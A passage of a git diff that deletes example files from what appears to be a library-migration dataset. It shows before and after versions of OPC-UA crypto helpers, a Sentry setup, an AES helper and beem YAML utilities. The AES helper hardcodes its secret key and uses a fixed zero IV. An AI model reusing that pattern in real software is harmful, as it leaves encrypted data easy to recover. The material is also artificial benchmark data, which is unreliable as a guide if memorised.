unpad(cipher.decrypt(enc[16:])) - - -def encrypt_rsa_oaep(privkey, data): - if not type(privkey) is RSA._RSAobj: - privkey = RSA.importKey(privkey) - cipher = PKCS1_OAEP.new(privkey, Hash.SHA256) - #cipher = PKCS1_OAEP.new(privkey, Hash.SHA) - ciphertext = cipher.encrypt(data) - return ciphertext - - -def pubkey_from_dercert(der): - cert = DerSequence() - cert.decode(der) - tbsCertificate = DerSequence() - tbsCertificate.decode(cert[0]) - subjectPublicKeyInfo = tbsCertificate[6] - - # Initialize RSA key - rsa_key = RSA.importKey(subjectPublicKeyInfo) - return rsa_key - - -def sign_sha256(key, data): - if not type(key) is RSA._RSAobj: - key = RSA.importKey(key) - myhash = SHA256.new(data).digest() - signature = key.sign(myhash, '') - return signature - - -def sign_sha1(key, data): - if not type(key) is RSA._RSAobj: - key = RSA.importKey(key) - myhash = SHA.new(data) - signer = PKCS1_v1_5.new(key) - signature = signer.sign(myhash) - return signature - - - - -if __name__ == "__main__": - import 
OpenSSL - # Convert from PEM to DER - pem = open("../examples/server_cert.pem").read() - der = PEM_cert_to_DER_cert(pem) - rsa_pubkey = pubkey_from_dercert(der) - priv_pem = open("../examples/mykey.pem").read() - rsa_privkey = RSA.importKey(priv_pem) - #lines = pem.replace(" ",'').split() - #der = a2b_base64(''.join(lines[1:-1])) - cert = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, pem) - - - # Extract subjectPublicKeyInfo field from X.509 certificate (see RFC3280) - #cert = DerSequence() - #cert.decode(der) - #tbsCertificate = DerSequence() - #tbsCertificate.decode(cert[0]) - #subjectPublicKeyInfo = tbsCertificate[6] - - # Initialize RSA key - #rsa_key = RSA.importKey(subjectPublicKeyInfo) - print("Pub Key", rsa_pubkey) - print("Priv Key", rsa_privkey) - msg = encrypt256(rsa_privkey, b"this is my message") - print("Encrypted data: ", msg) - from IPython import embed - embed() diff --git a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.target.py b/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.target.py deleted file mode 100644 index 8fd1b0a..0000000 --- a/v1/data/codefile/freeopcua@opcua-asyncio__cdaff15__opcua$uacrypto.py.target.py +++ /dev/null @@ -1,63 +0,0 @@ -import os - -from cryptography import x509 -from cryptography.hazmat.backends import default_backend -from cryptography.hazmat.primitives import serialization -from cryptography.hazmat.primitives import hashes -from cryptography.hazmat.primitives.asymmetric import padding - - -def load_certificate(path): - _, ext = os.path.splitext(path) - with open(path, "br") as f: - if ext == ".pem": - return x509.load_pem_x509_certificate(f.read(), default_backend()) - else: - return x509.load_der_x509_certificate(f.read(), default_backend()) - - -def x509_from_der(data): - if not data: - return None - return x509.load_der_x509_certificate(data, default_backend()) - - -def load_private_key(path): - with open(path, "br") as f: - return serialization.load_pem_private_key(f.read(), password=None, backend=default_backend()) - - -def der_from_x509(certificate): - if certificate is None: - return b"" - return certificate.public_bytes(serialization.Encoding.DER) - - -def sign_sha1(private_key, data): - signer = private_key.signer( - padding.PKCS1v15(), - hashes.SHA1() - ) - signer.update(data) - return signer.finalize() - - -def encrypt_basic256(public_key, data): - ciphertext = public_key.encrypt( - data, - padding.OAEP( - mgf=padding.MGF1(algorithm=hashes.SHA256()), - algorithm=hashes.SHA256(), - label=None) - ) - return ciphertext - - -if __name__ == "__main__": - # Convert from PEM to DER - cert = load_certificate("../examples/server_cert.pem") - #rsa_pubkey = pubkey_from_dercert(der) - rsa_privkey = load_private_key("../examples/mykey.pem") - - from IPython import embed - embed() diff --git a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.diff b/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.diff deleted file mode 100644 index 31f7566..0000000 --- a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/src/runserver.py b/src/runserver.py - index caa95e093b7ba45a88620efc71ad9e72b381d30c..0a65bcc2ce97a2e3ad9b028b1cf9bcc58499f5d9 100644 - --- a/src/runserver.py - +++ b/src/runserver.py -@@ -3,9 +3,13 @@ from myaas.settings import DEBUG, SENTRY_DSN - - app.debug = DEBUG - --if SENTRY_DSN: -- from raven.contrib.flask import Sentry -- Sentry(app, dsn=SENTRY_DSN) -+import sentry_sdk -+from 
sentry_sdk.integrations.flask import FlaskIntegration -+ -+sentry_sdk.init( -+ dsn=SENTRY_DSN, -+ integrations=[FlaskIntegration()] -+) - - if __name__ == '__main__': - app.run(host='0.0.0.0', port=5001) diff --git a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.source.py b/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.source.py deleted file mode 100644 index 94884e2..0000000 --- a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.source.py +++ /dev/null @@ -1,11 +0,0 @@ -from myaas.server import app -from myaas.settings import DEBUG, SENTRY_DSN - -app.debug = DEBUG - -if SENTRY_DSN: - from raven.contrib.flask import Sentry - Sentry(app, dsn=SENTRY_DSN) - -if __name__ == '__main__': - app.run(host='0.0.0.0', port=5001) diff --git a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.target.py b/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.target.py deleted file mode 100644 index df9c493..0000000 --- a/v1/data/codefile/habitissimo@myaas__0a65bcc__src$runserver.py.target.py +++ /dev/null @@ -1,15 +0,0 @@ -from myaas.server import app -from myaas.settings import DEBUG, SENTRY_DSN - -app.debug = DEBUG - -import sentry_sdk -from sentry_sdk.integrations.flask import FlaskIntegration - -sentry_sdk.init( - dsn=SENTRY_DSN, - integrations=[FlaskIntegration()] -) - -if __name__ == '__main__': - app.run(host='0.0.0.0', port=5001) diff --git a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.diff b/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.diff deleted file mode 100644 index d8de093..0000000 --- a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.diff +++ /dev/null @@ -1,32 +0,0 @@ -diff --git a/sql/utils/aes_decryptor.py b/sql/utils/aes_decryptor.py - index fe8352ccf9fc4faa17103f341d62dcaafc60a7fa..e192ca69e2d610bc59a9f10165c7fd1c8ab9b157 100644 - --- a/sql/utils/aes_decryptor.py - +++ b/sql/utils/aes_decryptor.py -@@ -4,7 +4,7 @@ from binascii import b2a_hex, a2b_hex - - class Prpcrypt(): - def __init__(self): -- self.key = 'eCcGFZQj6PNoSSma31LR39rTzTbLkU8E' -+ self.key = 'eCcGFZQj6PNoSSma31LR39rTzTbLkU8E'.encode('utf-8') - self.mode = AES.MODE_CBC - - # 加密函数,如果text不足16位就用空格补足为16位, -@@ -23,7 +23,7 @@ class Prpcrypt(): - elif count > length: - add = (length - (count % length)) - text = text + ('\0' * add) -- self.ciphertext = cryptor.encrypt(text) -+ self.ciphertext = cryptor.encrypt(text.encode('utf-8')) - # 因为AES加密时候得到的字符串不一定是ascii字符集的,输出到终端或者保存时候可能存在问题 - # 所以这里统一把加密后的字符串转化为16进制字符串 - return b2a_hex(self.ciphertext).decode(encoding='utf-8') -@@ -37,8 +37,7 @@ class Prpcrypt(): - - if __name__ == '__main__': - pc = Prpcrypt() # 初始化密钥 -- import sys -- e = pc.encrypt(sys.argv[1]) # 加密 -+ e = pc.encrypt('123456') # 加密 - d = pc.decrypt(e) # 解密 - print("加密:", str(e)) - print("解密:", str(d)) diff --git a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.source.py b/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.source.py deleted file mode 100644 index 28fabbe..0000000 --- a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.source.py +++ /dev/null @@ -1,44 +0,0 @@ -from Crypto.Cipher import AES -from binascii import b2a_hex, a2b_hex - - -class Prpcrypt(): - def __init__(self): - self.key = 'eCcGFZQj6PNoSSma31LR39rTzTbLkU8E' - self.mode = AES.MODE_CBC - - # 加密函数,如果text不足16位就用空格补足为16位, - # 如果大于16当时不是16的倍数,那就补足为16的倍数。 - def encrypt(self, text): - cryptor = AES.new(self.key, self.mode, b'0000000000000000') - # 这里密钥key 
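
# The aes_decryptor.py change above is a Python 3 bytes fix rather than a
# library swap: AES.new() and encrypt() require bytes, so the str key and the
# zero-padded plaintext are encoded first. A runnable sketch of the pattern
# (works with PyCrypto or its PyCryptodome successor; values illustrative):
from binascii import b2a_hex

from Crypto.Cipher import AES

key = 'eCcGFZQj6PNoSSma31LR39rTzTbLkU8E'.encode('utf-8')  # 32 bytes -> AES-256
cipher = AES.new(key, AES.MODE_CBC, b'0000000000000000')
text = '123456'
text = text + '\0' * (16 - len(text) % 16)            # pad to the block size
print(b2a_hex(cipher.encrypt(text.encode('utf-8'))).decode())
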
长度必须为16(AES-128), - # 24(AES-192),或者32 (AES-256)Bytes 长度 - # 目前AES-128 足够目前使用 - length = 16 - count = len(text) - if count < length: - add = (length - count) - # \0 backspace - text = text + ('\0' * add) - elif count > length: - add = (length - (count % length)) - text = text + ('\0' * add) - self.ciphertext = cryptor.encrypt(text) - # 因为AES加密时候得到的字符串不一定是ascii字符集的,输出到终端或者保存时候可能存在问题 - # 所以这里统一把加密后的字符串转化为16进制字符串 - return b2a_hex(self.ciphertext).decode(encoding='utf-8') - - # 解密后,去掉补足的空格用strip() 去掉 - def decrypt(self, text): - cryptor = AES.new(self.key, self.mode, b'0000000000000000') - plain_text = cryptor.decrypt(a2b_hex(text)) - return plain_text.decode().rstrip('\0') - - -if __name__ == '__main__': - pc = Prpcrypt() # 初始化密钥 - import sys - e = pc.encrypt(sys.argv[1]) # 加密 - d = pc.decrypt(e) # 解密 - print("加密:", str(e)) - print("解密:", str(d)) diff --git a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.target.py b/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.target.py deleted file mode 100644 index d51aff3..0000000 --- a/v1/data/codefile/hhyo@archery__e192ca6__sql$utils$aes_decryptor.py.target.py +++ /dev/null @@ -1,43 +0,0 @@ -from Crypto.Cipher import AES -from binascii import b2a_hex, a2b_hex - - -class Prpcrypt(): - def __init__(self): - self.key = 'eCcGFZQj6PNoSSma31LR39rTzTbLkU8E'.encode('utf-8') - self.mode = AES.MODE_CBC - - # 加密函数,如果text不足16位就用空格补足为16位, - # 如果大于16当时不是16的倍数,那就补足为16的倍数。 - def encrypt(self, text): - cryptor = AES.new(self.key, self.mode, b'0000000000000000') - # 这里密钥key 长度必须为16(AES-128), - # 24(AES-192),或者32 (AES-256)Bytes 长度 - # 目前AES-128 足够目前使用 - length = 16 - count = len(text) - if count < length: - add = (length - count) - # \0 backspace - text = text + ('\0' * add) - elif count > length: - add = (length - (count % length)) - text = text + ('\0' * add) - self.ciphertext = cryptor.encrypt(text.encode('utf-8')) - # 因为AES加密时候得到的字符串不一定是ascii字符集的,输出到终端或者保存时候可能存在问题 - # 所以这里统一把加密后的字符串转化为16进制字符串 - return b2a_hex(self.ciphertext).decode(encoding='utf-8') - - # 解密后,去掉补足的空格用strip() 去掉 - def decrypt(self, text): - cryptor = AES.new(self.key, self.mode, b'0000000000000000') - plain_text = cryptor.decrypt(a2b_hex(text)) - return plain_text.decode().rstrip('\0') - - -if __name__ == '__main__': - pc = Prpcrypt() # 初始化密钥 - e = pc.encrypt('123456') # 加密 - d = pc.decrypt(e) # 解密 - print("加密:", str(e)) - print("解密:", str(d)) diff --git a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.diff b/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.diff deleted file mode 100644 index 2d8d6f6..0000000 --- a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.diff +++ /dev/null @@ -1,26 +0,0 @@ -diff --git a/beem/utils.py b/beem/utils.py - index c5d5d7bd42aca84d70ca3a4036fa8d1c00c877cb..f5ba90e2cc5bb88b29b173bae11ba46e06efecf7 100644 - --- a/beem/utils.py - +++ b/beem/utils.py -@@ -6,7 +6,7 @@ import math - from datetime import datetime, tzinfo, timedelta, date, time - import pytz - import difflib --import yaml -+from ruamel.yaml import YAML - - timeFormat = "%Y-%m-%dT%H:%M:%S" - # https://github.com/matiasb/python-unidiff/blob/master/unidiff/constants.py#L37 -@@ -371,9 +371,10 @@ def seperate_yaml_dict_from_body(content): - if len(content.split("---\n")) > 1: - body = content[content.find("---\n", 1) + 4 :] - yaml_content = content[content.find("---\n") + 4 : content.find("---\n", 1)] -- parameter = yaml.load(yaml_content, Loader=yaml.FullLoader) -+ yaml=YAML(typ="safe") -+ parameter = yaml.load(yaml_content) - if not 
isinstance(parameter, dict): -- parameter = yaml.load(yaml_content.replace(":", ": ").replace(" ", " "), Loader=yaml.FullLoader) -+ parameter = yaml.load(yaml_content.replace(":", ": ").replace(" ", " ")) - else: - body = content - return body, parameter diff --git a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.source.py b/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.source.py deleted file mode 100644 index 36a631c..0000000 --- a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.source.py +++ /dev/null @@ -1,387 +0,0 @@ -# -*- coding: utf-8 -*- -import re -import json -import time as timenow -import math -from datetime import datetime, tzinfo, timedelta, date, time -import pytz -import difflib -import yaml - -timeFormat = "%Y-%m-%dT%H:%M:%S" -# https://github.com/matiasb/python-unidiff/blob/master/unidiff/constants.py#L37 -# @@ (source offset, length) (target offset, length) @@ (section header) -RE_HUNK_HEADER = re.compile( - r"^@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))?\ @@[ ]?(.*)$", flags=re.MULTILINE -) - - -def formatTime(t): - """ Properly Format Time for permlinks - """ - if isinstance(t, float): - return datetime.utcfromtimestamp(t).strftime("%Y%m%dt%H%M%S%Z") - if isinstance(t, (datetime, date, time)): - return t.strftime("%Y%m%dt%H%M%S%Z") - - -def addTzInfo(t, timezone="UTC"): - """Returns a datetime object with tzinfo added""" - if t and isinstance(t, (datetime, date, time)) and t.tzinfo is None: - utc = pytz.timezone(timezone) - t = utc.localize(t) - return t - - -def formatTimeString(t): - """ Properly Format Time for permlinks - """ - if isinstance(t, (datetime, date, time)): - return t.strftime(timeFormat) - return addTzInfo(datetime.strptime(t, timeFormat)) - - -def formatToTimeStamp(t): - """ Returns a timestamp integer - - :param datetime t: datetime object - :return: Timestamp as integer - """ - if isinstance(t, (datetime, date, time)): - t = addTzInfo(t) - else: - t = formatTimeString(t) - epoch = addTzInfo(datetime(1970, 1, 1)) - return int((t - epoch).total_seconds()) - - -def formatTimeFromNow(secs=0): - """ Properly Format Time that is `x` seconds in the future - - :param int secs: Seconds to go in the future (`x>0`) or the - past (`x<0`) - :return: Properly formated time for Graphene (`%Y-%m-%dT%H:%M:%S`) - :rtype: str - - """ - return datetime.utcfromtimestamp(timenow.time() + int(secs)).strftime(timeFormat) - - -def formatTimedelta(td): - """Format timedelta to String - """ - if not isinstance(td, timedelta): - return "" - days, seconds = td.days, td.seconds - hours = days * 24 + seconds // 3600 - minutes = (seconds % 3600) // 60 - seconds = seconds % 60 - return "%d:%s:%s" % (hours, str(minutes).zfill(2), str(seconds).zfill(2)) - - -def parse_time(block_time): - """Take a string representation of time from the blockchain, and parse it - into datetime object. - """ - utc = pytz.timezone("UTC") - return utc.localize(datetime.strptime(block_time, timeFormat)) - - -def assets_from_string(text): - """Correctly split a string containing an asset pair. - - Splits the string into two assets with the separator being on of the - following: ``:``, ``/``, or ``-``. 
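
# The beem/utils.py diff above swaps PyYAML's yaml.load(..., Loader=FullLoader)
# for a reusable ruamel.yaml safe loader. A minimal sketch of the new call
# pattern on an illustrative front-matter snippet:
from ruamel.yaml import YAML

yaml = YAML(typ="safe")          # safe loading, no Loader argument needed
parameter = yaml.load("title: hello\ntags: [beem, yaml]\n")
assert parameter == {"title": "hello", "tags": ["beem", "yaml"]}
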
- """ - return re.split(r"[\-:\/]", text) - - -def sanitize_permlink(permlink): - permlink = permlink.strip() - permlink = re.sub(r"_|\s|\.", "-", permlink) - permlink = re.sub(r"[^\w-]", "", permlink) - permlink = re.sub(r"[^a-zA-Z0-9-]", "", permlink) - permlink = permlink.lower() - return permlink - - -def derive_permlink(title, parent_permlink=None, parent_author=None, - max_permlink_length=256, with_suffix=True): - """Derive a permlink from a comment title (for root level - comments) or the parent permlink and optionally the parent - author (for replies). - - """ - suffix = "-" + formatTime(datetime.utcnow()) + "z" - if parent_permlink and parent_author: - prefix = "re-" + sanitize_permlink(parent_author) + "-" - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - len(prefix) - else: - rem_chars = max_permlink_length - len(prefix) - body = sanitize_permlink(parent_permlink)[:rem_chars] - if with_suffix: - return prefix + body + suffix - else: - return prefix + body - elif parent_permlink: - prefix = "re-" - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - len(prefix) - else: - rem_chars = max_permlink_length - len(prefix) - body = sanitize_permlink(parent_permlink)[:rem_chars] - if with_suffix: - return prefix + body + suffix - else: - return prefix + body - else: - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - else: - rem_chars = max_permlink_length - body = sanitize_permlink(title)[:rem_chars] - if len(body) == 0: # empty title or title consisted of only special chars - return suffix[1:] # use timestamp only, strip leading "-" - if with_suffix: - return body + suffix - else: - return body - - -def resolve_authorperm(identifier): - """Correctly split a string containing an authorperm. - - Splits the string into author and permlink with the - following separator: ``/``. - - Examples: - - .. code-block:: python - - >>> from beem.utils import resolve_authorperm - >>> author, permlink = resolve_authorperm('https://d.tube/#!/v/pottlund/m5cqkd1a') - >>> author, permlink = resolve_authorperm("https://steemit.com/witness-category/@gtg/24lfrm-gtg-witness-log") - >>> author, permlink = resolve_authorperm("@gtg/24lfrm-gtg-witness-log") - >>> author, permlink = resolve_authorperm("https://busy.org/@gtg/24lfrm-gtg-witness-log") - - """ - # without any http(s) - match = re.match(r"@?([\w\-\.]*)/([\w\-]*)", identifier) - if hasattr(match, "group"): - return match.group(1), match.group(2) - # dtube url - match = re.match(r"([\w\-\.]+[^#?\s]+)/#!/v/?([\w\-\.]*)/([\w\-]*)", identifier) - if hasattr(match, "group"): - return match.group(2), match.group(3) - # url - match = re.match(r"([\w\-\.]+[^#?\s]+)/@?([\w\-\.]*)/([\w\-]*)", identifier) - if not hasattr(match, "group"): - raise ValueError("Invalid identifier") - return match.group(2), match.group(3) - - -def construct_authorperm(*args): - """ Create a post identifier from comment/post object or arguments. - Examples: - - .. 
code-block:: python - - >>> from beem.utils import construct_authorperm - >>> print(construct_authorperm('username', 'permlink')) - @username/permlink - >>> print(construct_authorperm({'author': 'username', 'permlink': 'permlink'})) - @username/permlink - - """ - username_prefix = "@" - if len(args) == 1: - op = args[0] - author, permlink = op["author"], op["permlink"] - elif len(args) == 2: - author, permlink = args - else: - raise ValueError("construct_identifier() received unparsable arguments") - - fields = dict(prefix=username_prefix, author=author, permlink=permlink) - return "{prefix}{author}/{permlink}".format(**fields) - - -def resolve_root_identifier(url): - m = re.match(r"/([^/]*)/@([^/]*)/([^#]*).*", url) - if not m: - return "", "" - else: - category = m.group(1) - author = m.group(2) - permlink = m.group(3) - return construct_authorperm(author, permlink), category - - -def resolve_authorpermvoter(identifier): - """Correctly split a string containing an authorpermvoter. - - Splits the string into author and permlink with the - following separator: ``/`` and ``|``. - """ - pos = identifier.find("|") - if pos < 0: - raise ValueError("Invalid identifier") - [author, permlink] = resolve_authorperm(identifier[:pos]) - return author, permlink, identifier[pos + 1 :] - - -def construct_authorpermvoter(*args): - """ Create a vote identifier from vote object or arguments. - Examples: - - .. code-block:: python - - >>> from beem.utils import construct_authorpermvoter - >>> print(construct_authorpermvoter('username', 'permlink', 'voter')) - @username/permlink|voter - >>> print(construct_authorpermvoter({'author': 'username', 'permlink': 'permlink', 'voter': 'voter'})) - @username/permlink|voter - - """ - username_prefix = "@" - if len(args) == 1: - op = args[0] - if "authorperm" in op: - authorperm, voter = op["authorperm"], op["voter"] - [author, permlink] = resolve_authorperm(authorperm) - else: - author, permlink, voter = op["author"], op["permlink"], op["voter"] - elif len(args) == 2: - authorperm, voter = args - [author, permlink] = resolve_authorperm(authorperm) - elif len(args) == 3: - author, permlink, voter = args - else: - raise ValueError("construct_identifier() received unparsable arguments") - - fields = dict(prefix=username_prefix, author=author, permlink=permlink, voter=voter) - return "{prefix}{author}/{permlink}|{voter}".format(**fields) - - -def reputation_to_score(rep): - """Converts the account reputation value into the reputation score""" - if isinstance(rep, str): - rep = int(rep) - if rep == 0: - return 25.0 - score = max([math.log10(abs(rep)) - 9, 0]) - if rep < 0: - score *= -1 - score = (score * 9.0) + 25.0 - return score - - -def remove_from_dict(obj, keys=list(), keep_keys=True): - """ Prune a class or dictionary of all but keys (keep_keys=True). - Prune a class or dictionary of specified keys.(keep_keys=False). 
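
# An illustrative call pattern for remove_from_dict above (values invented for
# the example): keep_keys=True keeps only the listed keys, keep_keys=False
# drops them.
from beem.utils import remove_from_dict

d = {"author": "gtg", "permlink": "log", "weight": 100}
assert remove_from_dict(d, keys=["author"], keep_keys=True) == {"author": "gtg"}
assert remove_from_dict(d, keys=["author"], keep_keys=False) == {"permlink": "log", "weight": 100}
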
- """ - if type(obj) == dict: - items = list(obj.items()) - elif isinstance(obj, dict): - items = list(obj.items()) - else: - items = list(obj.__dict__.items()) - if keep_keys: - return {k: v for k, v in items if k in keys} - else: - return {k: v for k, v in items if k not in keys} - - -def make_patch(a, b, n=3): - # _no_eol = '\n' + "\ No newline at end of file" + '\n' - _no_eol = "\n" - diffs = difflib.unified_diff(a.splitlines(True), b.splitlines(True), n=n) - try: - _, _ = next(diffs), next(diffs) - del _ - except StopIteration: - pass - return "".join([d if d[-1] == "\n" else d + _no_eol for d in diffs]) - - -def findall_patch_hunks(body=None): - return RE_HUNK_HEADER.findall(body) - - -def derive_beneficiaries(beneficiaries): - beneficiaries_list = [] - beneficiaries_accounts = [] - beneficiaries_sum = 0 - if not isinstance(beneficiaries, list): - beneficiaries = beneficiaries.split(",") - - for w in beneficiaries: - account_name = w.strip().split(":")[0] - if account_name[0] == "@": - account_name = account_name[1:] - if account_name in beneficiaries_accounts: - continue - if w.find(":") == -1: - percentage = -1 - else: - percentage = w.strip().split(":")[1] - if "%" in percentage: - percentage = percentage.strip().split("%")[0].strip() - percentage = float(percentage) - beneficiaries_sum += percentage - beneficiaries_list.append( - {"account": account_name, "weight": int(percentage * 100)} - ) - beneficiaries_accounts.append(account_name) - - missing = 0 - for bene in beneficiaries_list: - if bene["weight"] < 0: - missing += 1 - index = 0 - for bene in beneficiaries_list: - if bene["weight"] < 0: - beneficiaries_list[index]["weight"] = int( - (int(100 * 100) - int(beneficiaries_sum * 100)) / missing - ) - index += 1 - sorted_beneficiaries = sorted( - beneficiaries_list, key=lambda beneficiaries_list: beneficiaries_list["account"] - ) - return sorted_beneficiaries - - -def derive_tags(tags): - tags_list = [] - if len(tags.split(",")) > 1: - for tag in tags.split(","): - tags_list.append(tag.strip()) - elif len(tags.split(" ")) > 1: - for tag in tags.split(" "): - tags_list.append(tag.strip()) - elif len(tags) > 0: - tags_list.append(tags.strip()) - return tags_list - - -def seperate_yaml_dict_from_body(content): - parameter = {} - body = "" - if len(content.split("---\n")) > 1: - body = content[content.find("---\n", 1) + 4 :] - yaml_content = content[content.find("---\n") + 4 : content.find("---\n", 1)] - parameter = yaml.load(yaml_content, Loader=yaml.FullLoader) - if not isinstance(parameter, dict): - parameter = yaml.load(yaml_content.replace(":", ": ").replace(" ", " "), Loader=yaml.FullLoader) - else: - body = content - return body, parameter - - -def load_dirty_json(dirty_json): - regex_replace = [(r"([ \{,:\[])(u)?'([^']+)'", r'\1"\3"'), (r" False([, \}\]])", r' false\1'), (r" True([, \}\]])", r' true\1')] - for r, s in regex_replace: - dirty_json = re.sub(r, s, dirty_json) - clean_json = json.loads(dirty_json) - return clean_json diff --git a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.target.py b/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.target.py deleted file mode 100644 index 01a796b..0000000 --- a/v1/data/codefile/holgern@beem__f5ba90e__beem$utils.py.target.py +++ /dev/null @@ -1,388 +0,0 @@ -# -*- coding: utf-8 -*- -import re -import json -import time as timenow -import math -from datetime import datetime, tzinfo, timedelta, date, time -import pytz -import difflib -from ruamel.yaml import YAML - -timeFormat = "%Y-%m-%dT%H:%M:%S" -# 
https://github.com/matiasb/python-unidiff/blob/master/unidiff/constants.py#L37 -# @@ (source offset, length) (target offset, length) @@ (section header) -RE_HUNK_HEADER = re.compile( - r"^@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))?\ @@[ ]?(.*)$", flags=re.MULTILINE -) - - -def formatTime(t): - """ Properly Format Time for permlinks - """ - if isinstance(t, float): - return datetime.utcfromtimestamp(t).strftime("%Y%m%dt%H%M%S%Z") - if isinstance(t, (datetime, date, time)): - return t.strftime("%Y%m%dt%H%M%S%Z") - - -def addTzInfo(t, timezone="UTC"): - """Returns a datetime object with tzinfo added""" - if t and isinstance(t, (datetime, date, time)) and t.tzinfo is None: - utc = pytz.timezone(timezone) - t = utc.localize(t) - return t - - -def formatTimeString(t): - """ Properly Format Time for permlinks - """ - if isinstance(t, (datetime, date, time)): - return t.strftime(timeFormat) - return addTzInfo(datetime.strptime(t, timeFormat)) - - -def formatToTimeStamp(t): - """ Returns a timestamp integer - - :param datetime t: datetime object - :return: Timestamp as integer - """ - if isinstance(t, (datetime, date, time)): - t = addTzInfo(t) - else: - t = formatTimeString(t) - epoch = addTzInfo(datetime(1970, 1, 1)) - return int((t - epoch).total_seconds()) - - -def formatTimeFromNow(secs=0): - """ Properly Format Time that is `x` seconds in the future - - :param int secs: Seconds to go in the future (`x>0`) or the - past (`x<0`) - :return: Properly formated time for Graphene (`%Y-%m-%dT%H:%M:%S`) - :rtype: str - - """ - return datetime.utcfromtimestamp(timenow.time() + int(secs)).strftime(timeFormat) - - -def formatTimedelta(td): - """Format timedelta to String - """ - if not isinstance(td, timedelta): - return "" - days, seconds = td.days, td.seconds - hours = days * 24 + seconds // 3600 - minutes = (seconds % 3600) // 60 - seconds = seconds % 60 - return "%d:%s:%s" % (hours, str(minutes).zfill(2), str(seconds).zfill(2)) - - -def parse_time(block_time): - """Take a string representation of time from the blockchain, and parse it - into datetime object. - """ - utc = pytz.timezone("UTC") - return utc.localize(datetime.strptime(block_time, timeFormat)) - - -def assets_from_string(text): - """Correctly split a string containing an asset pair. - - Splits the string into two assets with the separator being on of the - following: ``:``, ``/``, or ``-``. - """ - return re.split(r"[\-:\/]", text) - - -def sanitize_permlink(permlink): - permlink = permlink.strip() - permlink = re.sub(r"_|\s|\.", "-", permlink) - permlink = re.sub(r"[^\w-]", "", permlink) - permlink = re.sub(r"[^a-zA-Z0-9-]", "", permlink) - permlink = permlink.lower() - return permlink - - -def derive_permlink(title, parent_permlink=None, parent_author=None, - max_permlink_length=256, with_suffix=True): - """Derive a permlink from a comment title (for root level - comments) or the parent permlink and optionally the parent - author (for replies). 
- - """ - suffix = "-" + formatTime(datetime.utcnow()) + "z" - if parent_permlink and parent_author: - prefix = "re-" + sanitize_permlink(parent_author) + "-" - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - len(prefix) - else: - rem_chars = max_permlink_length - len(prefix) - body = sanitize_permlink(parent_permlink)[:rem_chars] - if with_suffix: - return prefix + body + suffix - else: - return prefix + body - elif parent_permlink: - prefix = "re-" - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - len(prefix) - else: - rem_chars = max_permlink_length - len(prefix) - body = sanitize_permlink(parent_permlink)[:rem_chars] - if with_suffix: - return prefix + body + suffix - else: - return prefix + body - else: - if with_suffix: - rem_chars = max_permlink_length - len(suffix) - else: - rem_chars = max_permlink_length - body = sanitize_permlink(title)[:rem_chars] - if len(body) == 0: # empty title or title consisted of only special chars - return suffix[1:] # use timestamp only, strip leading "-" - if with_suffix: - return body + suffix - else: - return body - - -def resolve_authorperm(identifier): - """Correctly split a string containing an authorperm. - - Splits the string into author and permlink with the - following separator: ``/``. - - Examples: - - .. code-block:: python - - >>> from beem.utils import resolve_authorperm - >>> author, permlink = resolve_authorperm('https://d.tube/#!/v/pottlund/m5cqkd1a') - >>> author, permlink = resolve_authorperm("https://steemit.com/witness-category/@gtg/24lfrm-gtg-witness-log") - >>> author, permlink = resolve_authorperm("@gtg/24lfrm-gtg-witness-log") - >>> author, permlink = resolve_authorperm("https://busy.org/@gtg/24lfrm-gtg-witness-log") - - """ - # without any http(s) - match = re.match(r"@?([\w\-\.]*)/([\w\-]*)", identifier) - if hasattr(match, "group"): - return match.group(1), match.group(2) - # dtube url - match = re.match(r"([\w\-\.]+[^#?\s]+)/#!/v/?([\w\-\.]*)/([\w\-]*)", identifier) - if hasattr(match, "group"): - return match.group(2), match.group(3) - # url - match = re.match(r"([\w\-\.]+[^#?\s]+)/@?([\w\-\.]*)/([\w\-]*)", identifier) - if not hasattr(match, "group"): - raise ValueError("Invalid identifier") - return match.group(2), match.group(3) - - -def construct_authorperm(*args): - """ Create a post identifier from comment/post object or arguments. - Examples: - - .. code-block:: python - - >>> from beem.utils import construct_authorperm - >>> print(construct_authorperm('username', 'permlink')) - @username/permlink - >>> print(construct_authorperm({'author': 'username', 'permlink': 'permlink'})) - @username/permlink - - """ - username_prefix = "@" - if len(args) == 1: - op = args[0] - author, permlink = op["author"], op["permlink"] - elif len(args) == 2: - author, permlink = args - else: - raise ValueError("construct_identifier() received unparsable arguments") - - fields = dict(prefix=username_prefix, 